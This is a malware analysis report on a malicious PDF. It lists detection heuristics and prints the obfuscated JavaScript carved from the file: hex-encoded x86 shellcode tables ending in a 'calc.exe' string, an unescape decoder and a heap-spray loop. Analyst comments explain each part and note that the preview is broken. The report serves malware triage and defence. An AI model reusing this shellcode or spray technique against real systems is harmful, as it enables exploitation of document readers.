Malicious PDF — malware analysis report

Static analysis result for SHA-256 2333406f9d885620…

MALICIOUS

PDF

2.6 KB First seen: 2015-09-30
MD5: 87aca98af1058bbf4694e805249cd7b0 SHA-1: d81f8df189163bddbb9c449a539f35d3079a8fd2 SHA-256: 2333406f9d885620eced7723e63a60291cd90f53544d9058fce02b0cb072ac6f
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0007_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal. The obfuscated nature of the script prevents a detailed analysis of its specific actions, but it is likely designed to download and execute a second-stage payload or perform other malicious activities. The presence of JavaScript within a PDF is a common delivery mechanism for malware.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var temp1 = unescape(pt5());
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x26D 1739 bytes
SHA-256: 4e0caf646cc67915375aa926c0f22f602d3cead082b5d318323f4fd913be3f66
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/**
 * First of three hex-word tables (see pt2/pt3).
 * Each entry is four hex digits. The expression text returned by pt5()
 * joins the three tables with '%u', so unescape() would turn every word
 * into one UTF-16 code unit, i.e. two little-endian bytes ("e8fc" -> fc e8).
 * The leading "" makes join('%u') prefix the first word as well.
 * NOTE(analyst): the decoded bytes (fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 ...)
 * look like raw x86 machine code rather than text — confirm by disassembly.
 *
 * @returns {string[]} hex words, in order
 */
function pt1() {
    var ar1 = ["", "e8fc", "0089", "0000", "8960", "31e5", "64d2", "528b", "8b30", "0c52", "528b", "8b14", "2872", "b70f", "264a", "ff31", "c031", "3cac", "7c61", "2c02", "c120", "0dcf", "c701"];
    return ar1;
}

/**
 * Second hex-word table; same encoding as pt1 (four hex digits per entry,
 * each word = one UTF-16 code unit = two little-endian bytes once joined
 * with '%u' and passed through unescape()). Continues the byte stream
 * started by pt1 and finished by pt3.
 *
 * @returns {string[]} hex words, in order
 */
function pt2() {
    var ar2 = ["f0e2", "5752", "528b", "8b10", "3c42", "d001", "408b", "8578", "74c0", "014a", "50d0", "488b", "8b18", "2058", "d301", "3ce3", "8b49", "8b34", "d601", "ff31", "c031", "c1ac"];
    return ar2;
}

/**
 * Third and last hex-word table; same encoding as pt1/pt2.
 * NOTE(analyst): read as little-endian bytes, the trailing words
 * "6c61", "2e63", "7865", "0065" appear to decode to the ASCII string
 * "calc.exe" followed by a NUL — consistent with an embedded command
 * string inside the byte stream; confirm by decoding the full table.
 *
 * @returns {string[]} hex words, in order
 */
function pt3() {
    var ar3 = ["0dcf", "c701", "e038", "f475", "7d03", "3bf8", "247d", "e275", "8b58", "2458", "d301", "8b66", "4b0c", "588b", "011c", "8bd3", "8b04", "d001", "4489", "2424", "5b5b", "5961", "515a", "e0ff", "5f58", "8b5a", "eb12", "5d86", "016a", "858d", "00b9", "0000", "6850", "8b31", "876f", "d5ff", "f0bb", "a2b5", "6856", "95a6", "9dbd", "d5ff", "063c", "0a7c", "fb80", "75e0", "bb05", "1347", "6f72", "006a", "ff53", "63d5", "6c61", "2e63", "7865", "0065"];
    return ar3;
}

/**
 * Returns the SOURCE TEXT of the decoding expression, not its result:
 * the string literal "pt1().concat(pt2(),pt3()).join('%u')" is never
 * evaluated inside this function. The caller at the report's matched line,
 * `var temp1 = unescape(pt5());`, therefore receives that literal text
 * unchanged (it contains no %-escapes), so the hex tables are NOT decoded
 * at that point. Presumably a later eval() of temp1, not visible in this
 * preview, is what would turn it into the byte stream — or the sample is
 * damaged/decoy; confirm against the rest of the extracted script.
 *
 * @returns {string} JavaScript source text for the join expression
 */
function pt5() {

    return "pt1().concat(pt2(),pt3()).join('%u')";
}

/**
 * Returns two "90" words (0x90 is the x86 NOP opcode), the usual filler
 * material for a padded block.
 * NOTE(analyst): the only visible use, `e9 = et1.join("%u").concat(...)`,
 * references et1 without calling it; a function has no join(), so as written
 * that statement throws a TypeError before any of the later string-building
 * runs. Likewise `e1`, unescaped in the loop that follows, is never defined
 * in this preview. The script as shown is therefore broken, deliberately
 * damaged, or relies on definitions outside the first 1,000 lines — verify
 * before concluding what the spray stage actually does.
 *
 * @returns {string[]} ["90", "90"]
 */
function et1() {
    var ary1 = ["90", "90"];
    return ary1;
}

var temp1 = unescape(pt5());

e9 = et1.join("%u").concat(et1.join("%u"));

var temp2 = "";
for (i = 128; i >= 0; --i) {
    temp2 += unescape(e1);
}
temp4 = temp2 + temp1;
temp5 = unescape(e1);
temp6 = 20;
temp7 = temp6 + temp4.length
while (temp5.length < temp7) temp5 += temp5;
temp8 = temp5.substring(0, temp7);
temp9 = temp5.substring(0, temp5.length - temp7);
while (temp9.length + temp7 < 0x40000) temp9 = temp9 + temp9 + temp8;
temp10 = new Array();
for (temp11 = 0; temp11 < 1450; temp11++) temp10[temp11] = temp9 + temp4;
var temp12 = unescape("%"+"0"+"9");
while (temp12.length < 0x4000) temp12 += temp12;
temp12 = "N." + temp12;